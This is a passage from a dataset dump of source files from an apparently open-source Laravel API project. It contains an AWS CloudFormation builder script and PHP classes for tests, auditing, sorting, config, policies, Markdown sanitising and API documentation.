elb.Listener(\n 'LoadBalancerListener',\n LoadBalancerArn=Ref(load_balancer_resource),\n Port=443,\n Protocol='HTTPS',\n DefaultActions=[\n elb.Action(\n Type='forward',\n TargetGroupArn=Ref(api_target_group_resource)\n )\n ],\n Certificates=[\n elb.Certificate(\n CertificateArn=Ref(certificate_arn_parameter)\n )\n ]\n )\n)\n\necs_service_role_resource = template.add_resource(\n iam.Role(\n 'ECSServiceRole',\n AssumeRolePolicyDocument={\n 'Version': '2012-10-17',\n 'Statement': [\n {\n 'Action': 'sts:AssumeRole',\n 'Effect': 'Allow',\n 'Principal': {\n 'Service': 'ecs.amazonaws.com'\n }\n }\n ]\n },\n Policies=[\n iam.Policy(\n PolicyName='ECSServiceRolePolicy',\n PolicyDocument={\n 'Statement': [\n {\n 'Effect': 'Allow',\n 'Action': [\n 'ec2:AttachNetworkInterface',\n 'ec2:CreateNetworkInterface',\n 'ec2:CreateNetworkInterfacePermission',\n 'ec2:DeleteNetworkInterface',\n 'ec2:DeleteNetworkInterfacePermission',\n 'ec2:Describe*',\n 'ec2:DetachNetworkInterface',\n 'elasticloadbalancing:DeregisterInstancesFromLoadBalancer',\n 'elasticloadbalancing:DeregisterTargets',\n 'elasticloadbalancing:Describe*',\n 'elasticloadbalancing:RegisterInstancesWithLoadBalancer',\n 'elasticloadbalancing:RegisterTargets',\n 'route53:ChangeResourceRecordSets',\n 'route53:CreateHealthCheck',\n 'route53:DeleteHealthCheck',\n 'route53:Get*',\n 'route53:List*',\n 'route53:UpdateHealthCheck',\n 'servicediscovery:DeregisterInstance',\n 'servicediscovery:Get*',\n 'servicediscovery:List*',\n 'servicediscovery:RegisterInstance',\n 'servicediscovery:UpdateInstanceCustomHealthStatus'\n ],\n 'Resource': '*'\n },\n {\n 'Effect': 'Allow',\n 'Action': [\n 
'ec2:CreateTags'\n                                ],\n                                'Resource': 'arn:aws:ec2:*:*:network-interface/*'\n                            }\n                        ]\n                    }\n                )\n            ]\n        )\n)\n\napi_service_resource = template.add_resource(\n    ecs.Service(\n        'ApiService',\n        ServiceName='api',\n        Cluster=Ref(ecs_cluster_resource),\n        TaskDefinition=Ref(api_task_definition_resource),\n        DeploymentConfiguration=ecs.DeploymentConfiguration(\n            MinimumHealthyPercent=100,\n            MaximumPercent=200\n        ),\n        DesiredCount=Ref(api_task_count_parameter),\n        LaunchType='EC2',\n        LoadBalancers=[ecs.LoadBalancer(\n            ContainerName='api',\n            ContainerPort=80,\n            TargetGroupArn=Ref(api_target_group_resource)\n        )],\n        Role=Ref(ecs_service_role_resource),\n        DependsOn=[\n            load_balancer_http_listener_resource,\n            load_balancer_https_listener_resource\n        ]\n    )\n)\n\nqueue_worker_service_resource = template.add_resource(\n    ecs.Service(\n        'QueueWorkerService',\n        ServiceName='queue-worker',\n        Cluster=Ref(ecs_cluster_resource),\n        TaskDefinition=Ref(queue_worker_task_definition_resource),\n        DeploymentConfiguration=ecs.DeploymentConfiguration(\n            MinimumHealthyPercent=0,\n            MaximumPercent=100\n        ),\n        DesiredCount=Ref(queue_worker_task_count_parameter),\n        LaunchType='EC2'\n    )\n)\n\nscheduler_service_resource = template.add_resource(\n    ecs.Service(\n        'SchedulerService',\n        ServiceName='scheduler',\n        Cluster=Ref(ecs_cluster_resource),\n        TaskDefinition=Ref(scheduler_task_definition_resource),\n        DeploymentConfiguration=ecs.DeploymentConfiguration(\n            MinimumHealthyPercent=0,\n            MaximumPercent=100\n        ),\n        DesiredCount=Ref(scheduler_task_count_parameter),\n        LaunchType='EC2'\n    )\n)\n\nautoscaling_group_resource = template.add_resource(\n    autoscaling.AutoScalingGroup(\n        'AutoScalingGroup',\n        DesiredCapacity=Ref(api_instance_count_parameter),\n        MinSize=Ref(api_instance_count_parameter),\n        MaxSize=Ref(api_instance_count_parameter),\n        LaunchTemplate=autoscaling.LaunchTemplateSpecification(\n            LaunchTemplateId=Ref(launch_template_resource),\n            Version=GetAtt(launch_template_resource, 'LatestVersionNumber')\n        ),\n        AvailabilityZones=['eu-west-1a', 'eu-west-1b', 'eu-west-1c']\n    )\n)\n\napi_user_resource = template.add_resource(\n    iam.User(\n        'ApiUser',\n        UserName=api_user_name_variable,\n        Policies=[\n            iam.Policy(\n                PolicyName='ApiUserPolicy',\n                PolicyDocument={\n                    'Version': '2012-10-17',\n                    'Statement': [\n                        {\n                            'Action': 's3:*',\n                            'Effect': 'Allow',\n                            'Resource': [\n                                GetAtt(uploads_bucket_resource, 'Arn'),\n                                Join('/', [GetAtt(uploads_bucket_resource, 'Arn'), '*'])\n                            ]\n                        },\n                        {\n                            'Action': 'sqs:*',\n                            'Effect': 'Allow',\n                            'Resource': GetAtt(default_queue_resource, 'Arn')\n                        }\n                    ]\n                }\n            )\n        ]\n    )\n)\n\nci_user_resource = template.add_resource(\n    iam.User(\n        'CiUser',\n        UserName=ci_user_name_variable,\n        Policies=[\n            iam.Policy(\n                PolicyName='CiUserPolicy',\n                PolicyDocument={\n                    'Version': '2012-10-17',\n                    'Statement': [\n                        {\n                            'Action': 'ecr:*',\n                            'Effect': 'Allow',\n                            'Resource': '*'\n                        },\n                        {\n                            'Action': 'ecs:UpdateService',\n                            'Effect': 'Allow',\n                            'Resource': '*'\n                        },\n                        {\n                            'Action': 'secretsmanager:GetSecretValue',\n                            'Effect': 'Allow',\n                            'Resource': '*'\n                        }\n                    ]\n                }\n            )\n        ]\n    )\n)\n\n# ==================================================\n# Outputs.\n# ==================================================\ntemplate.add_output(\n    Output(\n        'DatabaseName',\n        Description='The database name',\n        Value=database_name_variable\n    )\n)\n\ntemplate.add_output(\n    Output(\n        'DatabaseUsername',\n        Description='The username for the database',\n        Value=database_username_variable\n    )\n)\n\ntemplate.add_output(\n    Output(\n        'DatabaseHost',\n        Description='The host of the RDS instance',\n        Value=GetAtt(database_resource, 'Endpoint.Address')\n    )\n)\n\ntemplate.add_output(\n    Output(\n        'DatabasePort',\n        Description='The port of the RDS instance',\n        Value=GetAtt(database_resource, 'Endpoint.Port')\n    )\n)\n\ntemplate.add_output(\n    Output(\n        'RedisHost',\n        Description='The host of the Redis instance',\n        Value=GetAtt(redis_resource, 'RedisEndpoint.Address')\n    )\n)\n\ntemplate.add_output(\n    Output(\n        'RedisPort',\n        Description='The port of the Redis instance',\n        Value=GetAtt(redis_resource, 'RedisEndpoint.Port')\n    )\n)\n\ntemplate.add_output(\n    Output(\n        'DefaultQueue',\n        Description='The name of the default queue',\n        Value=default_queue_name_variable\n    )\n)\n\ntemplate.add_output(\n    Output(\n        'LoadBalancerDomain',\n        Description='The domain name of the load balancer',\n        Value=GetAtt(load_balancer_resource, 'DNSName')\n    )\n)\n\ntemplate.add_output(\n    Output(\n        'DockerRepositoryUri',\n        Description='The URI of the Docker repository',\n        Value=Sub('${AWS::AccountId}.dkr.ecr.${AWS::Region}.amazonaws.com/${RepositoryName}', RepositoryName=Ref(docker_repository_resource))\n    )\n)\n\ntemplate.add_output(\n    Output(\n        'DockerClusterName',\n        Description='The name of the Docker cluster',\n        Value=Ref(ecs_cluster_resource)\n    )\n)\n\n# ==================================================\n# Print the generated template in JSON.\n# ==================================================\nprint(template.to_json())\n"
},
{
"alpha_fraction": 0.5085646510124207,
"alphanum_fraction": 0.5097460150718689,
"avg_line_length": 21.87837791442871,
"blob_id": "c1c7f64366520d00b2440fcf6f9fc0b12a3497b7",
"content_id": "ede10de1b104b056ecb9b364bbb9357f6088ef64",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1693,
"license_type": "permissive",
"max_line_length": 80,
"num_lines": 74,
"path": "/tests/Support/TestResponse.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace Tests\\Support;\n\nuse Illuminate\\Foundation\\Testing\\Assert as PHPUnit;\nuse Illuminate\\Foundation\\Testing\\TestResponse as BaseTestResponse;\n\nclass TestResponse extends BaseTestResponse\n{\n /**\n * Assert the JSON structure of an Eloquent API Resource Collection.\n *\n * @param array|null $structure\n */\n public function assertCollectionDataStructure(array $structure = null): void\n {\n $this->assertJsonStructure([\n 'data' => [$structure],\n 'meta' => [\n 'current_page',\n 'from',\n 'last_page',\n 'path',\n 'per_page',\n 'to',\n 'total',\n ],\n 'links' => [\n 'first',\n 'last',\n 'prev',\n 'next',\n ],\n ]);\n }\n\n /**\n * @param array|null $structure\n */\n public function assertResourceDataStructure(array $structure = null): void\n {\n $this->assertJsonStructure(['data' => $structure]);\n }\n\n /**\n * @param int $index\n * @param string $id\n */\n public function assertNthIdInCollection(int $index, string $id): void\n {\n $data = $this->getData();\n\n PHPUnit::assertGreaterThanOrEqual($index + 1, count($data));\n PHPUnit::assertEquals($id, $data[$index]['id']);\n }\n\n /**\n * @return array\n */\n public function getData(): array\n {\n return json_decode($this->getContent(), true)['data'];\n }\n\n /**\n * @return string\n */\n public function getId(): string\n {\n return $this->getData()['id'];\n }\n}\n"
},
{
"alpha_fraction": 0.595942497253418,
"alphanum_fraction": 0.5967878103256226,
"avg_line_length": 23.64583396911621,
"blob_id": "b152202dd3573912130335f4600d90af1ed32c0d",
"content_id": "ac2c2f15e8422dedd90e22fba088a72124e17987",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1183,
"license_type": "permissive",
"max_line_length": 59,
"num_lines": 48,
"path": "/app/Listeners/AuditLogger.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Listeners;\n\nuse App\\Events\\EndpointInvoked;\nuse App\\Services\\AuditService;\nuse Illuminate\\Contracts\\Queue\\ShouldQueue;\nuse Illuminate\\Queue\\InteractsWithQueue;\n\nclass AuditLogger implements ShouldQueue\n{\n use InteractsWithQueue;\n\n /**\n * @var \\App\\Services\\AuditService\n */\n protected $auditService;\n\n /**\n * AuditLogger constructor.\n *\n * @param \\App\\Services\\AuditService $auditService\n */\n public function __construct(AuditService $auditService)\n {\n $this->auditService = $auditService;\n }\n\n /**\n * Handle the event.\n *\n * @param \\App\\Events\\EndpointInvoked $event\n */\n public function handle(EndpointInvoked $event): void\n {\n $this->auditService->create([\n 'user_id' => $event->getUser()->id ?? null,\n 'client_id' => $event->getClient()->id ?? null,\n 'action' => $event->getAction(),\n 'description' => $event->getDescription(),\n 'ip_address' => $event->getIpAddress(),\n 'user_agent' => $event->getUserAgent(),\n 'created_at' => $event->getCreatedAt(),\n ]);\n }\n}\n"
},
{
"alpha_fraction": 0.6228710412979126,
"alphanum_fraction": 0.6253041625022888,
"avg_line_length": 26.399999618530273,
"blob_id": "ce977d4f970619e135c136d0adcbe2a874ee812e",
"content_id": "5bc8c56b3960aabb676f0f2c089bc161001ac0ac",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 822,
"license_type": "permissive",
"max_line_length": 98,
"num_lines": 30,
"path": "/app/Http/Sorts/Admin/EmailSort.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Http\\Sorts\\Admin;\n\nuse Illuminate\\Database\\Eloquent\\Builder;\nuse Illuminate\\Support\\Facades\\DB;\nuse Spatie\\QueryBuilder\\Sorts\\Sort;\n\nclass EmailSort implements Sort\n{\n /**\n * @param \\Illuminate\\Database\\Eloquent\\Builder $query\n * @param bool $descending\n * @param string $property\n * @return \\Illuminate\\Database\\Eloquent\\Builder\n */\n public function __invoke(Builder $query, $descending, string $property): Builder\n {\n $descending = $descending ? 'DESC' : 'ASC';\n\n $subQuery = DB::table('users')\n ->select('users.email')\n ->where('users.id', '=', DB::raw('`admins`.`user_id`'))\n ->take(1);\n\n return $query->orderByRaw(\"({$subQuery->toSql()}) $descending\", $subQuery->getBindings());\n }\n}\n"
},
{
"alpha_fraction": 0.5263158082962036,
"alphanum_fraction": 0.5338345766067505,
"avg_line_length": 11.090909004211426,
"blob_id": "0bc86c9c6b48ed44f6d069a1bc5e2e65b8110788",
"content_id": "13c701127d77f4259b6c4573f45c8ca5b89e8197",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 133,
"license_type": "permissive",
"max_line_length": 42,
"num_lines": 11,
"path": "/config/sms.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nreturn [\n\n 'driver' => env('SMS_DRIVER', 'null'),\n\n 'from' => env('SMS_FROM', 'Example'),\n\n];\n"
},
{
"alpha_fraction": 0.6770833134651184,
"alphanum_fraction": 0.6875,
"avg_line_length": 8.600000381469727,
"blob_id": "730abd0cd649f1b96e166c69b1cc4e8376beb631",
"content_id": "5ea4a02269f11956bff2d434cb6cc67f7f872783",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 96,
"license_type": "permissive",
"max_line_length": 28,
"num_lines": 10,
"path": "/app/Models/Scopes/FileTokenScopes.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Models\\Scopes;\n\ntrait FileTokenScopes\n{\n //\n}\n"
},
{
"alpha_fraction": 0.46666666865348816,
"alphanum_fraction": 0.4740740656852722,
"avg_line_length": 9.384614944458008,
"blob_id": "33d36a9759bf1b2a9204a7fc092d8ed18f475c8c",
"content_id": "a5cdc52c2b2901b0f30cefe47138f5e56d897d62",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 135,
"license_type": "permissive",
"max_line_length": 35,
"num_lines": 13,
"path": "/config/ayup.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nreturn [\n\n 'name' => 'Ayup Digital',\n\n 'url' => 'https://ayup.agency',\n\n 'email' => '[email protected]',\n\n];\n"
},
{
"alpha_fraction": 0.6331126093864441,
"alphanum_fraction": 0.634437084197998,
"avg_line_length": 19.405405044555664,
"blob_id": "cd42246c83a92d0b0b962af64c6a4e12440185b4",
"content_id": "1bc3747a5a43a4b12c1db7302d93aad9f1be4ff1",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 755,
"license_type": "permissive",
"max_line_length": 70,
"num_lines": 37,
"path": "/app/Policies/NotificationPolicy.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Policies;\n\nuse App\\Models\\Notification;\nuse App\\Models\\User;\nuse Illuminate\\Auth\\Access\\HandlesAuthorization;\n\nclass NotificationPolicy\n{\n use HandlesAuthorization;\n\n /**\n * Determine whether the user can list notifications.\n *\n * @param \\App\\Models\\User $user\n * @return bool\n */\n public function list(User $user): bool\n {\n return $user->isAdmin();\n }\n\n /**\n * Determine whether the user can view the notification.\n *\n * @param \\App\\Models\\User $user\n * @param \\App\\Models\\Notification $notification\n * @return bool\n */\n public function view(User $user, Notification $notification): bool\n {\n return $user->isAdmin();\n }\n}\n"
},
{
"alpha_fraction": 0.6836734414100647,
"alphanum_fraction": 0.6938775777816772,
"avg_line_length": 8.800000190734863,
"blob_id": "988952f0b3fb47fa4d46658686d79f79660021ac",
"content_id": "4b0e0e336979535a866ad5786105b9901e22e1cd",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 98,
"license_type": "permissive",
"max_line_length": 30,
"num_lines": 10,
"path": "/app/Models/Mutators/CountryMutators.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Models\\Mutators;\n\ntrait CountryMutators\n{\n //\n}\n"
},
{
"alpha_fraction": 0.6301652789115906,
"alphanum_fraction": 0.6322314143180847,
"avg_line_length": 19.16666603088379,
"blob_id": "96f20d0566967ab63918dad2b7767277b3eb7589",
"content_id": "3f5c13a5bc8b22fe31f6737d505b0a80a476e7a2",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 484,
"license_type": "permissive",
"max_line_length": 76,
"num_lines": 24,
"path": "/app/Http/Requests/Export/RequestExportRequest.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Http\\Requests\\Export;\n\nuse App\\Exporters\\AllExporter;\nuse Illuminate\\Foundation\\Http\\FormRequest;\nuse Illuminate\\Validation\\Rule;\n\nclass RequestExportRequest extends FormRequest\n{\n /**\n * Get the validation rules that apply to the request.\n *\n * @return array\n */\n public function rules(): array\n {\n return [\n 'export' => ['bail', 'string', Rule::in([AllExporter::type()])],\n ];\n }\n}\n"
},
{
"alpha_fraction": 0.5875805616378784,
"alphanum_fraction": 0.588166356086731,
"avg_line_length": 27.93220329284668,
"blob_id": "685b475d66a0a9c84dd7b11fa2be5f593731f713",
"content_id": "75e6387b9646d358eb3feb559cf232a19309b362",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1707,
"license_type": "permissive",
"max_line_length": 75,
"num_lines": 59,
"path": "/tests/Unit/Services/FileServiceTest.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace Tests\\Unit\\Services;\n\nuse App\\Events\\File\\FileRequested;\nuse App\\Models\\Admin;\nuse App\\Models\\File;\nuse App\\Services\\FileService;\nuse Illuminate\\Support\\Facades\\Event;\nuse Tests\\TestCase;\n\nclass FileServiceTest extends TestCase\n{\n /** @test */\n public function it_creates_a_file_token(): void\n {\n /** @var \\App\\Models\\File $file */\n $file = factory(File::class)->create();\n\n /** @var \\App\\Models\\Admin $admin */\n $admin = factory(Admin::class)->create();\n\n /** @var \\App\\Services\\FileService $fileService */\n $fileService = resolve(FileService::class);\n\n $fileToken = $fileService->request($file, $admin);\n\n $this->assertDatabaseHas('file_tokens', ['id' => $fileToken->id]);\n $this->assertEquals($file->id, $fileToken->file->id);\n $this->assertEquals($admin->user->id, $fileToken->user->id);\n }\n\n /** @test */\n public function it_dispatches_an_event_when_requested(): void\n {\n Event::fake([FileRequested::class]);\n\n /** @var \\App\\Models\\File $file */\n $file = factory(File::class)->create();\n\n /** @var \\App\\Models\\Admin $admin */\n $admin = factory(Admin::class)->create();\n\n /** @var \\App\\Services\\FileService $fileService */\n $fileService = resolve(FileService::class);\n\n $fileToken = $fileService->request($file, $admin);\n\n Event::assertDispatched(\n FileRequested::class,\n function (FileRequested $event) use ($file, $fileToken): bool {\n return $event->getFile()->is($file)\n && $event->getFileToken()->is($fileToken);\n }\n );\n }\n}\n"
},
{
"alpha_fraction": 0.6736842393875122,
"alphanum_fraction": 0.6842105388641357,
"avg_line_length": 8.5,
"blob_id": "328e147d7b5e967bdaa06a69c7d17f8cee8b2e2b",
"content_id": "51d9444410acfc292a29bcd735e2157dc760ed5d",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 95,
"license_type": "permissive",
"max_line_length": 30,
"num_lines": 10,
"path": "/app/Models/Mutators/FileMutators.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Models\\Mutators;\n\ntrait FileMutators\n{\n //\n}\n"
},
{
"alpha_fraction": 0.6145610213279724,
"alphanum_fraction": 0.6156316995620728,
"avg_line_length": 20.227272033691406,
"blob_id": "7a1a8267a98107e30c955822c8a0bf16d84d2d1a",
"content_id": "1644d353f0f70eb457ffeaadb1608c3892d3c558",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 934,
"license_type": "permissive",
"max_line_length": 73,
"num_lines": 44,
"path": "/app/VariableSubstitution/Email/EndUser/EmailConfirmationSubstituter.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\VariableSubstitution\\Email\\EndUser;\n\nuse App\\Models\\EndUser;\nuse App\\VariableSubstitution\\BaseVariableSubstituter;\n\nclass EmailConfirmationSubstituter extends BaseVariableSubstituter\n{\n /**\n * @var \\App\\Models\\EndUser\n */\n protected $endUser;\n\n /**\n * @var string\n */\n protected $verifyEmailUrl;\n\n /**\n * EmailConfirmationSubstituter constructor.\n *\n * @param \\App\\Models\\EndUser $endUser\n * @param string $verifyEmailUrl\n */\n public function __construct(EndUser $endUser, string $verifyEmailUrl)\n {\n $this->endUser = $endUser;\n $this->verifyEmailUrl = $verifyEmailUrl;\n }\n\n /**\n * @return array\n */\n protected function variables(): array\n {\n return [\n 'END_USER_EMAIL' => $this->endUser->user->email,\n 'VERIFY_EMAIL_URL' => $this->verifyEmailUrl,\n ];\n }\n}\n"
},
{
"alpha_fraction": 0.56255042552948,
"alphanum_fraction": 0.5633575320243835,
"avg_line_length": 25.36170196533203,
"blob_id": "ddb4275323b8e9318d8f8fc86a84c11238abab13",
"content_id": "84e9b892aad94069477bdc75be739b8e01c135eb",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 2478,
"license_type": "permissive",
"max_line_length": 92,
"num_lines": 94,
"path": "/app/VariableSubstitution/BaseVariableSubstituter.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\VariableSubstitution;\n\nabstract class BaseVariableSubstituter implements VariableSubstituter\n{\n /**\n * @param string $content The entire content including variables that need substituting\n * @return string|null\n */\n public function substitute(string $content): ?string\n {\n $this->validateVariables();\n $allVariables = $this->extractAllVariables($content);\n $supportedVariables = $this->filterSupportedVariables($allVariables);\n\n foreach ($supportedVariables as $supportedVariable) {\n $content = str_replace(\n \"(({$supportedVariable}))\",\n $this->variables()[$supportedVariable],\n $content\n );\n }\n\n return $content;\n }\n\n /**\n * @return array\n */\n abstract protected function variables(): array;\n\n /**\n * @throws \\InvalidArgumentException\n */\n protected function validateVariables(): void\n {\n foreach ($this->variables() as $key => $value) {\n if (!is_string($key)) {\n throw new \\InvalidArgumentException('The variable keys must be strings.');\n }\n\n if (!is_scalar($value)) {\n throw new \\InvalidArgumentException('The variable values must be scalars.');\n }\n }\n }\n\n /**\n * @param string $content\n * @return string[] The variables without the double brace wrapping\n */\n protected function extractAllVariables(string $content): array\n {\n $matches = [];\n\n preg_match_all('/\\(\\(([A-Z_]+)\\)\\)/', $content, $matches);\n\n return $matches[1];\n }\n\n /**\n * @param string[] $variables\n * @return string[]\n */\n protected function filterSupportedVariables(array $variables): array\n {\n $supportedVariables = [];\n\n foreach ($variables as $variable) {\n if (array_key_exists($variable, $this->variables())) {\n $supportedVariables[] = $variable;\n continue;\n }\n\n $this->logUnsupportedVariable($variable);\n }\n\n return $supportedVariables;\n }\n\n /**\n * @param string $variable\n */\n protected function logUnsupportedVariable(string $variable): void\n {\n logger()->warning(\"The variable [{$variable}] is not supported.\", [\n 'variable' => $variable,\n 'substituter' => static::class,\n ]);\n }\n}\n"
},
{
"alpha_fraction": 0.635796070098877,
"alphanum_fraction": 0.6378772258758545,
"avg_line_length": 30,
"blob_id": "65058d4c56e738d810f2397d003c4cb4fc3ae2b1",
"content_id": "347c215fcb93f16729c8f531f94e26f4212b2bf9",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 961,
"license_type": "permissive",
"max_line_length": 82,
"num_lines": 31,
"path": "/app/Docs/Parameters/PerPageParameter.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs\\Parameters;\n\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\BaseObject;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Parameter;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Schema;\nuse Illuminate\\Support\\Facades\\Config;\n\nclass PerPageParameter extends Parameter\n{\n /**\n * @param string|null $objectId\n * @return \\GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Parameter\n */\n public static function create(string $objectId = null): BaseObject\n {\n return parent::create($objectId)\n ->in(static::IN_QUERY)\n ->name('per_page')\n ->description('The number of items to load per page')\n ->schema(\n Schema::integer()\n ->minimum(1)\n ->maximum(Config::get('connecting_voices.pagination.max'))\n ->default(Config::get('connecting_voices.pagination.default'))\n );\n }\n}\n"
},
{
"alpha_fraction": 0.6772983074188232,
"alphanum_fraction": 0.6810506582260132,
"avg_line_length": 23.227272033691406,
"blob_id": "dbfd4a92dcf26a75906e2b33bb517cdfa6b4cb56",
"content_id": "8aa17b4e9a5f66b69eb381aee092042a855d7256",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 533,
"license_type": "permissive",
"max_line_length": 70,
"num_lines": 22,
"path": "/app/Docs/Server.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs;\n\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\BaseObject;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Server as BaseServer;\n\nclass Server extends BaseServer\n{\n /**\n * @param string|null $objectId\n * @return \\GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Server\n */\n public static function create(string $objectId = null): BaseObject\n {\n return parent::create($objectId)\n ->url(url('/v1'))\n ->description('The API server');\n }\n}\n"
},
{
"alpha_fraction": 0.5536445379257202,
"alphanum_fraction": 0.5544635653495789,
"avg_line_length": 19.016393661499023,
"blob_id": "42b31e31873075e770a3907bb05f11121db432c7",
"content_id": "27a68f492f6ce9f9a061022b2b4b1af52ed618a6",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1221,
"license_type": "permissive",
"max_line_length": 62,
"num_lines": 61,
"path": "/app/Support/Markdown.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Support;\n\nuse Parsedown;\n\nclass Markdown\n{\n /**\n * @var \\Parsedown\n */\n protected $parsedown;\n\n /**\n * Markdown constructor.\n *\n * @param \\Parsedown $parsedown\n */\n public function __construct(Parsedown $parsedown)\n {\n $this->parsedown = $parsedown;\n }\n\n /**\n * @param string $markdown\n * @return string\n */\n public function sanitise(string $markdown): string\n {\n // Strip all HTML tags.\n $markdown = strip_tags($markdown);\n\n // Hard removal of XSS.\n $markdown = str_replace('javascript:', '', $markdown);\n\n // Trim whitespaces after sanitising.\n $markdown = trim($markdown);\n\n return $markdown;\n }\n\n /**\n * Removed all markdown markup from the string.\n *\n * @param string $markdown\n * @return string\n */\n public function strip(string $markdown): string\n {\n // Convert the markdown to HTML.\n $html = $this->parsedown->text($markdown);\n\n // Replace line breaks with spaces.\n $html = mb_ereg_replace(\"\\n\", ' ', $html);\n\n // Sanitise the HTML.\n return $this->sanitise($html);\n }\n}\n"
},
{
"alpha_fraction": 0.6430788040161133,
"alphanum_fraction": 0.643699586391449,
"avg_line_length": 32.5625,
"blob_id": "68122453ab5ac7dcd60893ca72a4651126a61c4b",
"content_id": "40438083cc8480bb4aa74a4ddee3398df203711f",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1611,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 48,
"path": "/app/Docs/Operations/Settings/UpdateSettingsOperation.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs\\Operations\\Settings;\n\nuse App\\Docs\\Schemas\\ResourceSchema;\nuse App\\Docs\\Schemas\\Setting\\SettingsSchema;\nuse App\\Docs\\Schemas\\Setting\\UpdateSettingsSchema;\nuse App\\Docs\\Tags\\SettingsTag;\nuse App\\Docs\\Utils;\nuse App\\Models\\Admin;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\BaseObject;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\MediaType;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Operation;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\RequestBody;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Response;\n\nclass UpdateSettingsOperation extends Operation\n{\n /**\n * @param string|null $objectId\n * @throws \\GoldSpecDigital\\ObjectOrientedOAS\\Exceptions\\InvalidArgumentException\n * @return \\GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Operation\n */\n public static function create(string $objectId = null): BaseObject\n {\n return parent::create($objectId)\n ->action(static::ACTION_PUT)\n ->summary('Update the settings')\n ->description(\n Utils::operationDescription([Admin::class])\n )\n ->tags(SettingsTag::create())\n ->requestBody(\n RequestBody::create()->content(\n MediaType::json()->schema(UpdateSettingsSchema::create())\n )\n )\n ->responses(\n Response::ok()->content(\n MediaType::json()->schema(\n ResourceSchema::create(null, SettingsSchema::create())\n )\n )\n );\n }\n}\n"
},
{
"alpha_fraction": 0.541100800037384,
"alphanum_fraction": 0.5418155789375305,
"avg_line_length": 21.206348419189453,
"blob_id": "143c561637a2cc9d225ffe3eb43efccad85f1da9",
